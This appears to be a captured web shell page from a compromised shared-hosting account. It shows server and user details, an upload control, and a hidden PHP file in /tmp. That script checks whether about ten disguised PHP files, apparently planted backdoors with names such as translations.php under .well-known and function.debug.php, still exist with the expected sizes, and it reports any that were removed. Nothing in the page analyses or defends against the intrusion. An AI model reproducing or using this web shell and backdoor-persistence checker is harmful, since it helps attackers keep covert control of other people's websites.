HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.comp
<?php   $r = '/home/vitanhod/vigolic-1001.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1314832@@55",
"/.well-known/pki-validation/translations.php"=>"bd@@1310608@@1025",
"/orderemail.php"=>"bd@@1315035@@25",
"/includes/config.php"=>"bd@@1314987@@93",
"/help_attachments.php"=>"bd@@1315096@@13",
"/.well-known/styles.php"=>"bd@@1310679@@1076",
"/.well-known/styles.php"=>"bd@@1314904@@1",
"/help_attachments.php"=>"bd@@1310558@@807",
"/includes/function.debug.php"=>"bd@@1309818@@989",
"/img/articles_popular.php"=>"bd@@1310647@@1089"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');